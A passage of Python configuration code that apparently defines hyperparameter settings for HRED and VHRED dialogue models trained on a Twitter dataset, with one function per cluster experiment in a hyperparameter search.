state['condition_latent_variable_on_dialogue_encoder'] = False
state['train_latent_variables_with_kl_divergence_annealing'] = False
state['kl_divergence_annealing_rate'] = 1.0/60000.0
state['decoder_drop_previous_input_tokens'] = False
state['decoder_drop_previous_input_tokens_rate'] = 0.75
state['patience'] = 20
return state
def prototype_twitter_HRED_NormOp_ClusterExp2():
state = prototype_state()
# Fill your paths here!
state['train_dialogues'] = "../TwitterDataBPE/Train.dialogues.pkl"
state['test_dialogues'] = "../TwitterDataBPE/Test.dialogues.pkl"
state['valid_dialogues'] = "../TwitterDataBPE/Valid.dialogues.pkl"
state['dictionary'] = "../TwitterDataBPE/Dataset.dict.pkl"
state['save_dir'] = "Output"
state['max_grad_steps'] = 80
state['valid_freq'] = 2500
state['prefix'] = "TwitterModel_"
state['updater'] = 'adam'
state['bidirectional_utterance_encoder'] = True
state['deep_dialogue_encoder_input'] = False
state['deep_utterance_decoder_out'] = True
state['bs'] = 80
state['decoder_bias_type'] = 'all' # Choose between 'first', 'all' and 'selective'
state['direct_connection_between_encoders_and_decoder'] = True
state['deep_direct_connection'] = False
state['qdim_encoder'] = 1000
state['qdim_decoder'] = 1000
state['sdim'] = 1000
state['rankdim'] = 400
state['utterance_decoder_gating'] = 'LSTM'
state['add_latent_gaussian_per_utterance'] = False
state['latent_gaussian_per_utterance_dim'] = 100
state['scale_latent_gaussian_variable_variances'] = 0.1
state['add_latent_piecewise_per_utterance'] = False
state['latent_piecewise_per_utterance_dim'] = 100
state['latent_piecewise_alpha_variables'] = 3
state['scale_latent_piecewise_variable_alpha_use_softplus'] = False
state['scale_latent_piecewise_variable_prior_alpha'] = 1.0
state['scale_latent_piecewise_variable_posterior_alpha'] = 1.0
state['condition_latent_variable_on_dialogue_encoder'] = False
state['train_latent_variables_with_kl_divergence_annealing'] = False
state['kl_divergence_annealing_rate'] = 1.0/60000.0
state['decoder_drop_previous_input_tokens'] = False
state['decoder_drop_previous_input_tokens_rate'] = 0.75
state['patience'] = 20
return state
def prototype_twitter_HRED_NormOp_ClusterExp3():
state = prototype_state()
# Fill your paths here!
state['train_dialogues'] = "../TwitterDataBPE/Train.dialogues.pkl"
state['test_dialogues'] = "../TwitterDataBPE/Test.dialogues.pkl"
state['valid_dialogues'] = "../TwitterDataBPE/Valid.dialogues.pkl"
state['dictionary'] = "../TwitterDataBPE/Dataset.dict.pkl"
state['save_dir'] = "Output"
state['max_grad_steps'] = 80
state['valid_freq'] = 2500
state['prefix'] = "TwitterModel_"
state['updater'] = 'adam'
state['bidirectional_utterance_encoder'] = True
state['deep_dialogue_encoder_input'] = False
state['deep_utterance_decoder_out'] = True
state['bs'] = 80
state['decoder_bias_type'] = 'all' # Choose between 'first', 'all' and 'selective'
state['direct_connection_between_encoders_and_decoder'] = True
state['deep_direct_connection'] = False
state['qdim_encoder'] = 1000
state['qdim_decoder'] = 2000
state['sdim'] = 1000
state['rankdim'] = 400
state['utterance_decoder_gating'] = 'LSTM'
state['add_latent_gaussian_per_utterance'] = False
state['latent_gaussian_per_utterance_dim'] = 100
state['scale_latent_gaussian_variable_variances'] = 0.1
state['add_latent_piecewise_per_utterance'] = False
state['latent_piecewise_per_utterance_dim'] = 100
state['latent_piecewise_alpha_variables'] = 3
state['scale_latent_piecewise_variable_alpha_use_softplus'] = False
state['scale_latent_piecewise_variable_prior_alpha'] = 1.0
state['scale_latent_piecewise_variable_posterior_alpha'] = 1.0
state['condition_latent_variable_on_dialogue_encoder'] = False
state['train_latent_variables_with_kl_divergence_annealing'] = False
state['kl_divergence_annealing_rate'] = 1.0/60000.0
state['decoder_drop_previous_input_tokens'] = False
state['decoder_drop_previous_input_tokens_rate'] = 0.75
state['patience'] = 20
return state
def prototype_twitter_HRED_NormOp_ClusterExp4():
state = prototype_state()
# Fill your paths here!
state['train_dialogues'] = "../TwitterDataBPE/Train.dialogues.pkl"
state['test_dialogues'] = "../TwitterDataBPE/Test.dialogues.pkl"
state['valid_dialogues'] = "../TwitterDataBPE/Valid.dialogues.pkl"
state['dictionary'] = "../TwitterDataBPE/Dataset.dict.pkl"
state['save_dir'] = "Output"
state['max_grad_steps'] = 80
state['valid_freq'] = 2500
state['prefix'] = "TwitterModel_"
state['updater'] = 'adam'
state['bidirectional_utterance_encoder'] = True
state['deep_dialogue_encoder_input'] = False
state['deep_utterance_decoder_out'] = True
state['bs'] = 80
state['decoder_bias_type'] = 'all' # Choose between 'first', 'all' and 'selective'
state['direct_connection_between_encoders_and_decoder'] = True
state['deep_direct_connection'] = False
state['qdim_encoder'] = 1000
state['qdim_decoder'] = 4000
state['sdim'] = 1000
state['rankdim'] = 400
state['utterance_decoder_gating'] = 'LSTM'
state['add_latent_gaussian_per_utterance'] = False
state['latent_gaussian_per_utterance_dim'] = 100
state['scale_latent_gaussian_variable_variances'] = 0.1
state['add_latent_piecewise_per_utterance'] = False
state['latent_piecewise_per_utterance_dim'] = 100
state['latent_piecewise_alpha_variables'] = 3
state['scale_latent_piecewise_variable_alpha_use_softplus'] = False
state['scale_latent_piecewise_variable_prior_alpha'] = 1.0
state['scale_latent_piecewise_variable_posterior_alpha'] = 1.0
state['condition_latent_variable_on_dialogue_encoder'] = False
state['train_latent_variables_with_kl_divergence_annealing'] = False
state['kl_divergence_annealing_rate'] = 1.0/60000.0
state['decoder_drop_previous_input_tokens'] = False
state['decoder_drop_previous_input_tokens_rate'] = 0.75
state['patience'] = 20
return state
def prototype_twitter_HRED_NormOp_ClusterExp5():
state = prototype_state()
# Fill your paths here!
state['train_dialogues'] = "../TwitterDataBPE/Train.dialogues.pkl"
state['test_dialogues'] = "../TwitterDataBPE/Test.dialogues.pkl"
state['valid_dialogues'] = "../TwitterDataBPE/Valid.dialogues.pkl"
state['dictionary'] = "../TwitterDataBPE/Dataset.dict.pkl"
state['save_dir'] = "Output"
state['max_grad_steps'] = 80
state['valid_freq'] = 2500
state['prefix'] = "TwitterModel_"
state['updater'] = 'adam'
state['bidirectional_utterance_encoder'] = True
state['deep_dialogue_encoder_input'] = False
state['deep_utterance_decoder_out'] = True
state['bs'] = 80
state['decoder_bias_type'] = 'all' # Choose between 'first', 'all' and 'selective'
state['direct_connection_between_encoders_and_decoder'] = True
state['deep_direct_connection'] = False
state['qdim_encoder'] = 2000
state['qdim_decoder'] = 4000
state['sdim'] = 1000
state['rankdim'] = 400
state['utterance_decoder_gating'] = 'LSTM'
state['add_latent_gaussian_per_utterance'] = False
state['latent_gaussian_per_utterance_dim'] = 100
state['scale_latent_gaussian_variable_variances'] = 0.1
state['add_latent_piecewise_per_utterance'] = False
state['latent_piecewise_per_utterance_dim'] = 100
state['latent_piecewise_alpha_variables'] = 3
state['scale_latent_piecewise_variable_alpha_use_softplus'] = False
state['scale_latent_piecewise_variable_prior_alpha'] = 1.0
state['scale_latent_piecewise_variable_posterior_alpha'] = 1.0
state['condition_latent_variable_on_dialogue_encoder'] = False
state['train_latent_variables_with_kl_divergence_annealing'] = False
state['kl_divergence_annealing_rate'] = 1.0/60000.0
state['decoder_drop_previous_input_tokens'] = False
state['decoder_drop_previous_input_tokens_rate'] = 0.75
state['patience'] = 20
return state
###
### Twitter - Hyperparameter search for Gaussian VHRED:
###
# sdim = {500, 1000}
# qdim_encoder = {1000}
# qdim_decoder = {1000, 2000, 4000}
# rankdim = 400
# latent_gaussian_per_utterance_dim = {100, 300}
# bidirectional_utterance_encoder = True
# reset_utterance_encoder_at_end_of_utterance = False
# reset_utterance_decoder_at_end_of_utterance = True
# lr = 0.0002
# bs = 80
# normop_type = 'LN'
def prototype_twitter_GaussOnly_VHRED_NormOp_ClusterExp1():
state = prototype_state()
# Fill your paths here!
state['train_dialogues'] = "../TwitterDataBPE/Train.dialogues.pkl"
state['test_dialogues'] = "../TwitterDataBPE/Test.dialogues.pkl"
state['valid_dialogues'] = "../TwitterDataBPE/Valid.dialogues.pkl"
state['dictionary'] = "../TwitterDataBPE/Dataset.dict.pkl"
state['save_dir'] = "Output"
state['max_grad_steps'] = 80
state['valid_freq'] = 2500
state['prefix'] = "TwitterModel_"
state['updater'] = 'adam'
state['bidirectional_utterance_encoder'] = True
state['deep_dialogue_encoder_input'] = False
state['deep_utterance_decoder_out'] = True
state['bs'] = 80
state['decoder_bias_type'] = 'all' # Choose between 'first', 'all' and 'selective'
state['direct_connection_between_encoders_and_decoder'] = True
state['deep_direct_connection'] = False
state['qdim_encoder'] = 1000
state['qdim_decoder'] = 1000
state['sdim'] = 500
state['rankdim'] = 400
state['utterance_decoder_gating'] = 'LSTM'
state['add_latent_gaussian_per_utterance'] = True
state['latent_gaussian_per_utterance_dim'] = 100
state['scale_latent_gaussian_variable_variances'] = 0.1
state['add_latent_piecewise_per_utterance'] = False
state['latent_piecewise_per_utterance_dim'] = 100
state['latent_piecewise_alpha_variables'] = 3
state['scale_latent_piecewise_variable_alpha_use_softplus'] = False
state['scale_latent_piecewise_variable_prior_alpha'] = 1.0
state['scale_latent_piecewise_variable_posterior_alpha'] = 1.0
state['condition_latent_variable_on_dialogue_encoder'] = True
state['train_latent_variables_with_kl_divergence_annealing'] = True
state['kl_divergence_annealing_rate'] = 1.0/60000.0
state['decoder_drop_previous_input_tokens'] = True
state['decoder_drop_previous_input_tokens_rate'] = 0.75
state['patience'] = 20
return state
def prototype_twitter_GaussOnly_VHRED_NormOp_ClusterExp2():
state = prototype_state()
# Fill your paths here!
state['train_dialogues'] = "../TwitterDataBPE/Train.dialogues.pkl"
state['test_dialogues'] = "../TwitterDataBPE/Test.dialogues.pkl"
state['valid_dialogues'] = "../TwitterDataBPE/Valid.dialogues.pkl"
state['dictionary'] = "../TwitterDataBPE/Dataset.dict.pkl"
state['save_dir'] = "Output"
state['max_grad_steps'] = 80
state['valid_freq'] = 2500
state['prefix'] = "TwitterModel_"
state['updater'] = 'adam'
state['bidirectional_utterance_encoder'] = True
state['deep_dialogue_encoder_input'] = False
state['deep_utterance_decoder_out'] = True
state['bs'] = 80
state['decoder_bias_type'] = 'all' # Choose between 'first', 'all' and 'selective'
state['direct_connection_between_encoders_and_decoder'] = True
state['deep_direct_connection'] = False
state['qdim_encoder'] = 1000
state['qdim_decoder'] = 1000
state['sdim'] = 1000
state['rankdim'] = 400
state['utterance_decoder_gating'] = 'LSTM'
state['add_latent_gaussian_per_utterance'] = True
state['latent_gaussian_per_utterance_dim'] = 100
state['scale_latent_gaussian_variable_variances'] = 0.1
state['add_latent_piecewise_per_utterance'] = False
state['latent_piecewise_per_utterance_dim'] = 100
state['latent_piecewise_alpha_variables'] = 3
state['scale_latent_piecewise_variable_alpha_use_softplus'] = False
state['scale_latent_piecewise_variable_prior_alpha'] = 1.0
state['scale_latent_piecewise_variable_posterior_alpha'] = 1.0
state['condition_latent_variable_on_dialogue_encoder'] = True
state['train_latent_variables_with_kl_divergence_annealing'] = True
state['kl_divergence_annealing_rate'] = 1.0/60000.0
state['decoder_drop_previous_input_tokens'] = True
state['decoder_drop_previous_input_tokens_rate'] = 0.75
state['patience'] = 20
return state
def prototype_twitter_GaussOnly_VHRED_NormOp_ClusterExp3():
state = prototype_state()
# Fill your paths here!
state['train_dialogues'] = "../TwitterDataBPE/Train.dialogues.pkl"
state['test_dialogues'] = "../TwitterDataBPE/Test.dialogues.pkl"
state['valid_dialogues'] = "../TwitterDataBPE/Valid.dialogues.pkl"
state['dictionary'] = "../TwitterDataBPE/Dataset.dict.pkl"
state['save_dir'] = "Output"
state['max_grad_steps'] = 80
state['valid_freq'] = 2500
state['prefix'] = "TwitterModel_"
state['updater'] = 'adam'
state['bidirectional_utterance_encoder'] = True
state['deep_dialogue_encoder_input'] = False
state['deep_utterance_decoder_out'] = True
state['bs'] = 80
state['decoder_bias_type'] = 'all' # Choose between 'first', 'all' and 'selective'
state['direct_connection_between_encoders_and_decoder'] = True
state['deep_direct_connection'] = False
state['qdim_encoder'] = 1000
state['qdim_decoder'] = 2000
state['sdim'] = 1000
state['rankdim'] = 400
state['utterance_decoder_gating'] = 'LSTM'
state['add_latent_gaussian_per_utterance'] = True
state['latent_gaussian_per_utterance_dim'] = 100
state['scale_latent_gaussian_variable_variances'] = 0.1
state['add_latent_piecewise_per_utterance'] = False
state['latent_piecewise_per_utterance_dim'] = 100
state['latent_piecewise_alpha_variables'] = 3
state['scale_latent_piecewise_variable_alpha_use_softplus'] = False
state['scale_latent_piecewise_variable_prior_alpha'] = 1.0
state['scale_latent_piecewise_variable_posterior_alpha'] = 1.0
state['condition_latent_variable_on_dialogue_encoder'] = True
state['train_latent_variables_with_kl_divergence_annealing'] = True
state['kl_divergence_annealing_rate'] = 1.0/60000.0
state['decoder_drop_previous_input_tokens'] = True
state['decoder_drop_previous_input_tokens_rate'] = 0.75
state['patience'] = 20
return state
def prototype_twitter_GaussOnly_VHRED_NormOp_ClusterExp4():
state = prototype_state()
# Fill your paths here!
state['train_dialogues'] = "../TwitterDataBPE/Train.dialogues.pkl"
state['test_dialogues'] = "../TwitterDataBPE/Test.dialogues.pkl"
state['valid_dialogues'] = "../TwitterDataBPE/Valid.dialogues.pkl"
state['dictionary'] = "../TwitterDataBPE/Dataset.dict.pkl"
state['save_dir'] = "Output"
state['max_grad_steps'] = 80
state['valid_freq'] = 2500
state['prefix'] = "TwitterModel_"
state['updater'] = 'adam'
state['bidirectional_utterance_encoder'] = True
state['deep_dialogue_encoder_input'] = False
state['deep_utterance_decoder_out'] = True
state['bs'] = 80
state['decoder_bias_type'] = 'all' # Choose between 'first', 'all' and 'selective'
state['direct_connection_between_encoders_and_decoder'] = True
state['deep_direct_connection'] = False
state['qdim_encoder'] = 1000
state['qdim_decoder'] = 4000
state['sdim'] = 1000
state['rankdim'] = 400
state['utterance_decoder_gating'] = 'LSTM'
state['add_latent_gaussian_per_utterance'] = True
state['latent_gaussian_per_utterance_dim'] = 100
state['scale_latent_gaussian_variable_variances'] = 0.1
state['add_latent_piecewise_per_utterance'] = False
state['latent_piecewise_per_utterance_dim'] = 100
state['latent_piecewise_alpha_variables'] = 3
state['scale_latent_piecewise_variable_alpha_use_softplus'] = False
state['scale_latent_piecewise_variable_prior_alpha'] = 1.0
state['scale_latent_piecewise_variable_posterior_alpha'] = 1.0
state['condition_latent_variable_on_dialogue_encoder'] = True
state['train_latent_variables_with_kl_divergence_annealing'] = True
state['kl_divergence_annealing_rate'] = 1.0/60000.0
state['decoder_drop_previous_input_tokens'] = True
state['decoder_drop_previous_input_tokens_rate'] = 0.75
state['patience'] = 20
return state
def prototype_twitter_GaussOnly_VHRED_NormOp_ClusterExp5():
state = prototype_state()
# Fill your paths here!
state['train_dialogues'] = "../TwitterDataBPE/Train.dialogues.pkl"
state['test_dialogues'] = "../TwitterDataBPE/Test.dialogues.pkl"
state['valid_dialogues'] = "../TwitterDataBPE/Valid.dialogues.pkl"
state['dictionary'] = "../TwitterDataBPE/Dataset.dict.pkl"
state['save_dir'] = "Output"
state['max_grad_steps'] = 80
state['valid_freq'] = 2500
state['prefix'] = "TwitterModel_"
state['updater'] = 'adam'
state['bidirectional_utterance_encoder'] = True
state['deep_dialogue_encoder_input'] = False
state['deep_utterance_decoder_out'] = True
state['bs'] = 80
state['decoder_bias_type'] = 'all' # Choose between 'first', 'all' and 'selective'
state['direct_connection_between_encoders_and_decoder'] = True
state['deep_direct_connection'] = False
state['qdim_encoder'] = 1000
state['qdim_decoder'] = 4000
state['sdim'] = 1000
state['rankdim'] = 400
state['utterance_decoder_gating'] = 'LSTM'
state['add_latent_gaussian_per_utterance'] = True
state['latent_gaussian_per_utterance_dim'] = 300
state['scale_latent_gaussian_variable_variances'] = 0.1
state['add_latent_piecewise_per_utterance'] = False
state['latent_piecewise_per_utterance_dim'] = 100
state['latent_piecewise_alpha_variables'] = 3
state['scale_latent_piecewise_variable_alpha_use_softplus'] = False
state['scale_latent_piecewise_variable_prior_alpha'] = 1.0
state['scale_latent_piecewise_variable_posterior_alpha'] = 1.0
state['condition_latent_variable_on_dialogue_encoder'] = True
state['train_latent_variables_with_kl_divergence_annealing'] = True
state['kl_divergence_annealing_rate'] = 1.0/60000.0
state['decoder_drop_previous_input_tokens'] = True
state['decoder_drop_previous_input_tokens_rate'] = 0.75
state['patience'] = 20
return state
###
### Twitter - Hyperparameter search for Piecewise-Gaussian VHRED:
###
# sdim = {500, 1000}
# qdim_encoder = {1000}
# qdim_decoder = {1000, 2000, 4000}
# rankdim = 400
# latent_gaussian_per_utterance_dim = {100, 300}
# latent_piecewise_per_utterance_dim = {100, 300}
# gate_latent_piecewise_per_utterance = {False, True}
# bidirectional_utterance_encoder = True
# reset_utterance_encoder_at_end_of_utterance = False
# reset_utterance_decoder_at_end_of_utterance = True
# lr = 0.0002
# bs = 80
# normop_type = 'LN'
def prototype_twitter_GaussPiecewise_VHRED_NormOp_ClusterExp1():
state = prototype_state()
# Fill your paths here!
state['train_dialogues'] = "../TwitterDataBPE/Train.dialogues.pkl"
state['test_dialogues'] = "../TwitterDataBPE/Test.dialogues.pkl"
state['valid_dialogues'] = "../TwitterDataBPE/Valid.dialogues.pkl"
state['dictionary'] = "../TwitterDataBPE/Dataset.dict.pkl"
state['save_dir'] = "Output"
state['max_grad_steps'] = 80
state['valid_freq'] = 2500
state['prefix'] = "TwitterModel_"
state['updater'] = 'adam'
state['bidirectional_utterance_encoder'] = True
state['deep_dialogue_encoder_input'] = False
state['deep_utterance_decoder_out'] = True
state['bs'] = 80
state['decoder_bias_type'] = 'all' # Choose between 'first', 'all' and 'selective'
state['direct_connection_between_encoders_and_decoder'] = True
state['deep_direct_connection'] = False
state['qdim_encoder'] = 1000
state['qdim_decoder'] = 1000
state['sdim'] = 500
state['rankdim'] = 400
state['utterance_decoder_gating'] = 'LSTM'
state['add_latent_gaussian_per_utterance'] = True
state['latent_gaussian_per_utterance_dim'] = 100
state['scale_latent_gaussian_variable_variances'] = 0.1
state['add_latent_piecewise_per_utterance'] = True
state['latent_piecewise_per_utterance_dim'] = 100
state['latent_piecewise_alpha_variables'] = 3
state['scale_latent_piecewise_variable_alpha_use_softplus'] = False
state['scale_latent_piecewise_variable_prior_alpha'] = 1.0
state['scale_latent_piecewise_variable_posterior_alpha'] = 1.0
state['condition_latent_variable_on_dialogue_encoder'] = True
state['train_latent_variables_with_kl_divergence_annealing'] = True
state['kl_divergence_annealing_rate'] = 1.0/60000.0
state['decoder_drop_previous_input_tokens'] = True
state['decoder_drop_previous_input_tokens_rate'] = 0.75
state['patience'] = 20
return state
def prototype_twitter_GaussPiecewise_VHRED_NormOp_ClusterExp2():
state = prototype_state()
# Fill your paths here!
state['train_dialogues'] = "../TwitterDataBPE/Train.dialogues.pkl"
state['test_dialogues'] = "../TwitterDataBPE/Test.dialogues.pkl"
state['valid_dialogues'] = "../TwitterDataBPE/Valid.dialogues.pkl"
state['dictionary'] = "../TwitterDataBPE/Dataset.dict.pkl"
state['save_dir'] = "Output"
state['max_grad_steps'] = 80
state['valid_freq'] = 2500
state['prefix'] = "TwitterModel_"
state['updater'] = 'adam'
state['bidirectional_utterance_encoder'] = True
state['deep_dialogue_encoder_input'] = False
state['deep_utterance_decoder_out'] = True
state['bs'] = 80
state['decoder_bias_type'] = 'all' # Choose between 'first', 'all' and 'selective'
state['direct_connection_between_encoders_and_decoder'] = True
state['deep_direct_connection'] = False
state['qdim_encoder'] = 1000
state['qdim_decoder'] = 1000
state['sdim'] = 1000
state['rankdim'] = 400
state['utterance_decoder_gating'] = 'LSTM'
state['add_latent_gaussian_per_utterance'] = True
state['latent_gaussian_per_utterance_dim'] = 100
state['scale_latent_gaussian_variable_variances'] = 0.1
state['add_latent_piecewise_per_utterance'] = True
state['latent_piecewise_per_utterance_dim'] = 100
state['latent_piecewise_alpha_variables'] = 3
state['scale_latent_piecewise_variable_alpha_use_softplus'] = False
state['scale_latent_piecewise_variable_prior_alpha'] = 1.0
state['scale_latent_piecewise_variable_posterior_alpha'] = 1.0
state['condition_latent_variable_on_dialogue_encoder'] = True
state['train_latent_variables_with_kl_divergence_annealing'] = True
state['kl_divergence_annealing_rate'] = 1.0/60000.0
state['decoder_drop_previous_input_tokens'] = True
state['decoder_drop_previous_input_tokens_rate'] = 0.75
state['patience'] = 20
return state
def prototype_twitter_GaussPiecewise_VHRED_NormOp_ClusterExp3():
state = prototype_state()
# Fill your paths here!
state['train_dialogues'] = "../TwitterDataBPE/Train.dialogues.pkl"
state['test_dialogues'] = "../TwitterDataBPE/Test.dialogues.pkl"
state['valid_dialogues'] = "../TwitterDataBPE/Valid.dialogues.pkl"
state['dictionary'] = "../TwitterDataBPE/Dataset.dict.pkl"
state['save_dir'] = "Output"
state['max_grad_steps'] = 80
state['valid_freq'] = 2500
state['prefix'] = "TwitterModel_"
state['updater'] = 'adam'
state['bidirectional_utterance_encoder'] = True
state['deep_dialogue_encoder_input'] = False
state['deep_utterance_decoder_out'] = True
state['bs'] = 80
state['decoder_bias_type'] = 'all' # Choose between 'first', 'all' and 'selective'
state['direct_connection_between_encoders_and_decoder'] = True
state['deep_direct_connection'] = False
state['qdim_encoder'] = 1000
state['qdim_decoder'] = 2000
state['sdim'] = 1000
state['rankdim'] = 400
state['utterance_decoder_gating'] = 'LSTM'
state['add_latent_gaussian_per_utterance'] = True
state['latent_gaussian_per_utterance_dim'] = 100
state['scale_latent_gaussian_variable_variances'] = 0.1
state['add_latent_piecewise_per_utterance'] = True
state['latent_piecewise_per_utterance_dim'] = 100
state['latent_piecewise_alpha_variables'] = 3
state['scale_latent_piecewise_variable_alpha_use_softplus'] = False
state['scale_latent_piecewise_variable_prior_alpha'] = 1.0
state['scale_latent_piecewise_variable_posterior_alpha'] = 1.0
state['condition_latent_variable_on_dialogue_encoder'] = True
state['train_latent_variables_with_kl_divergence_annealing'] = True
state['kl_divergence_annealing_rate'] = 1.0/60000.0
state['decoder_drop_previous_input_tokens'] = True
state['decoder_drop_previous_input_tokens_rate'] = 0.75
state['patience'] = 20
return state
def prototype_twitter_GaussPiecewise_VHRED_NormOp_ClusterExp4():
state = prototype_state()
# Fill your paths here!
state['train_dialogues'] = "../TwitterDataBPE/Train.dialogues.pkl"
state['test_dialogues'] = "../TwitterDataBPE/Test.dialogues.pkl"
state['valid_dialogues'] = "../TwitterDataBPE/Valid.dialogues.pkl"
state['dictionary'] = "../TwitterDataBPE/Dataset.dict.pkl"
state['save_dir'] = "Output"
state['max_grad_steps'] = 80
state['valid_freq'] = 2500
state['prefix'] = "TwitterModel_"
state['updater'] = 'adam'
state['bidirectional_utterance_encoder'] = True
state['deep_dialogue_encoder_input'] = False
state['deep_utterance_decoder_out'] = True
state['bs'] = 80
state['decoder_bias_type'] = 'all' # Choose between 'first', 'all' and 'selective'
state['direct_connection_between_encoders_and_decoder'] = True
state['deep_direct_connection'] = False
state['qdim_encoder'] = 1000
state['qdim_decoder'] = 4000
state['sdim'] = 1000
state['rankdim'] = 400
state['utterance_decoder_gating'] = 'LSTM'
state['add_latent_gaussian_per_utterance'] = True
state['latent_gaussian_per_utterance_dim'] = 100
state['scale_latent_gaussian_variable_variances'] = 0.1
state['add_latent_piecewise_per_utterance'] = True
state['latent_piecewise_per_utterance_dim'] = 100
state['latent_piecewise_alpha_variables'] = 3
state['scale_latent_piecewise_variable_alpha_use_softplus'] = False
state['scale_latent_piecewise_variable_prior_alpha'] = 1.0
state['scale_latent_piecewise_variable_posterior_alpha'] = 1.0
state['condition_latent_variable_on_dialogue_encoder'] = True
state['train_latent_variables_with_kl_divergence_annealing'] = True
state['kl_divergence_annealing_rate'] = 1.0/60000.0
state['decoder_drop_previous_input_tokens'] = True
state['decoder_drop_previous_input_tokens_rate'] = 0.75
state['patience'] = 20
return state
def prototype_twitter_GaussPiecewise_VHRED_NormOp_ClusterExp5():
state = prototype_state()
# Fill your paths here!
state['train_dialogues'] = "../TwitterDataBPE/Train.dialogues.pkl"
state['test_dialogues'] = "../TwitterDataBPE/Test.dialogues.pkl"
state['valid_dialogues'] = "../TwitterDataBPE/Valid.dialogues.pkl"
state['dictionary'] = "../TwitterDataBPE/Dataset.dict.pkl"
state['save_dir'] = "Output"
state['max_grad_steps'] = 80
state['valid_freq'] = 2500
state['prefix'] = "TwitterModel_"
state['updater'] = 'adam'
state['bidirectional_utterance_encoder'] = True
state['deep_dialogue_encoder_input'] = False
state['deep_utterance_decoder_out'] = True
state['bs'] = 80
state['decoder_bias_type'] = 'all' # Choose between 'first', 'all' and 'selective'
state['direct_connection_between_encoders_and_decoder'] = True
state['deep_direct_connection'] = False
state['qdim_encoder'] = 1000
state['qdim_decoder'] = 4000
state['sdim'] = 1000
state['rankdim'] = 400
state['utterance_decoder_gating'] = 'LSTM'
state['add_latent_gaussian_per_utterance'] = True
state['latent_gaussian_per_utterance_dim'] = 300
state['scale_latent_gaussian_variable_variances'] = 0.1
state['add_latent_piecewise_per_utterance'] = True
state['latent_piecewise_per_utterance_dim'] = 300
state['latent_piecewise_alpha_variables'] = 3
state['scale_latent_piecewise_variable_alpha_use_softplus'] = False
state['scale_latent_piecewise_variable_prior_alpha'] = 1.0
state['scale_latent_piecewise_variable_posterior_alpha'] = 1.0
state['condition_latent_variable_on_dialogue_encoder'] = True
state['train_latent_variables_with_kl_divergence_annealing'] = True
state['kl_divergence_annealing_rate'] = 1.0/60000.0
state['decoder_drop_previous_input_tokens'] = True
state['decoder_drop_previous_input_tokens_rate'] = 0.75
state['patience'] = 20
return state
def prototype_twitter_GaussPiecewise_VHRED_NormOp_ClusterExp6():
state = prototype_state()
# Fill your paths here!
state['train_dialogues'] = "../TwitterDataBPE/Train.dialogues.pkl"
state['test_dialogues'] = "../TwitterDataBPE/Test.dialogues.pkl"
state['valid_dialogues'] = "../TwitterDataBPE/Valid.dialogues.pkl"
state['dictionary'] = "../TwitterDataBPE/Dataset.dict.pkl"
state['save_dir'] = "Output"
state['max_grad_steps'] = 80
state['valid_freq'] = 2500
state['prefix'] = "TwitterModel_"
state['updater'] = 'adam'
state['bidirectional_utterance_encoder'] = True
state['deep_dialogue_encoder_input'] = False
state['deep_utterance_decoder_out'] = True
state['bs'] = 80
state['decoder_bias_type'] = 'all' # Choose between 'first', 'all' and 'selective'
state['direct_connection_between_encoders_and_decoder'] = True
state['deep_direct_connection'] = False
state['qdim_encoder'] = 1000
state['qdim_decoder'] = 2000
state['sdim'] = 1000
state['rankdim'] = 400
state['utterance_decoder_gating'] = 'LSTM'
state['add_latent_gaussian_per_utterance'] = True
state['latent_gaussian_per_utterance_dim'] = 100
state['scale_latent_gaussian_variable_variances'] = 0.1
state['add_latent_piecewise_per_utterance'] = True
state['latent_piecewise_per_utterance_dim'] = 100
state['latent_piecewise_alpha_variables'] = 3
state['scale_latent_piecewise_variable_alpha_use_softplus'] = False
state['scale_latent_piecewise_variable_prior_alpha'] = 1.0
state['scale_latent_piecewise_variable_posterior_alpha'] = 1.0
state['condition_latent_variable_on_dialogue_encoder'] = True
state['train_latent_variables_with_kl_divergence_annealing'] = True
state['kl_divergence_annealing_rate'] = 1.0/60000.0
state['decoder_drop_previous_input_tokens'] = True
state['decoder_drop_previous_input_tokens_rate'] = 0.75
state['patience'] = 20
state['gate_latent_piecewise_per_utterance'] = False
return state
def prototype_twitter_GaussPiecewise_VHRED_NormOp_ClusterExp7():
state = prototype_state()
# Fill your paths here!
state['train_dialogues'] = "../TwitterDataBPE/Train.dialogues.pkl"
state['test_dialogues'] = "../TwitterDataBPE/Test.dialogues.pkl"
state['valid_dialogues'] = "../TwitterDataBPE/Valid.dialogues.pkl"
state['dictionary'] = "../TwitterDataBPE/Dataset.dict.pkl"
state['save_dir'] = "Output"
state['max_grad_steps'] = 80
state['valid_freq'] = 2500
state['prefix'] = "TwitterModel_"
state['updater'] = 'adam'
state['bidirectional_utterance_encoder'] = True
state['deep_dialogue_encoder_input'] = False
state['deep_utterance_decoder_out'] = True
state['bs'] = 80
state['decoder_bias_type'] = 'all' # Choose between 'first', 'all' and 'selective'
state['direct_connection_between_encoders_and_decoder'] = True
state['deep_direct_connection'] = False
state['qdim_encoder'] = 1000
state['qdim_decoder'] = 4000
state['sdim'] = 1000
state['rankdim'] = 400
state['utterance_decoder_gating'] = 'LSTM'
state['add_latent_gaussian_per_utterance'] = True
state['latent_gaussian_per_utterance_dim'] = 100
state['scale_latent_gaussian_variable_variances'] = 0.1
state['add_latent_piecewise_per_utterance'] = True
state['latent_piecewise_per_utterance_dim'] = 100
state['latent_piecewise_alpha_variables'] = 3
state['scale_latent_piecewise_variable_alpha_use_softplus'] = False
state['scale_latent_piecewise_variable_prior_alpha'] = 1.0
state['scale_latent_piecewise_variable_posterior_alpha'] = 1.0
state['condition_latent_variable_on_dialogue_encoder'] = True
state['train_latent_variables_with_kl_divergence_annealing'] = True
state['kl_divergence_annealing_rate'] = 1.0/60000.0
state['decoder_drop_previous_input_tokens'] = True
state['decoder_drop_previous_input_tokens_rate'] = 0.75
state['patience'] = 20
state['gate_latent_piecewise_per_utterance'] = False
return state
def prototype_twitter_GaussPiecewise_VHRED_NormOp_ClusterExp8():
state = prototype_state()
# Fill your paths here!
state['train_dialogues'] = "../TwitterDataBPE/Train.dialogues.pkl"
state['test_dialogues'] = "../TwitterDataBPE/Test.dialogues.pkl"
state['valid_dialogues'] = "../TwitterDataBPE/Valid.dialogues.pkl"
state['dictionary'] = "../TwitterDataBPE/Dataset.dict.pkl"
state['save_dir'] = "Output"
state['max_grad_steps'] = 80
state['valid_freq'] = 2500
state['prefix'] = "TwitterModel_"
state['updater'] = 'adam'
state['bidirectional_utterance_encoder'] = True
state['deep_dialogue_encoder_input'] = False
state['deep_utterance_decoder_out'] = True
state['bs'] = 80
state['decoder_bias_type'] = 'all' # Choose between 'first', 'all' and 'selective'
state['direct_connection_between_encoders_and_decoder'] = True
state['deep_direct_connection'] = False
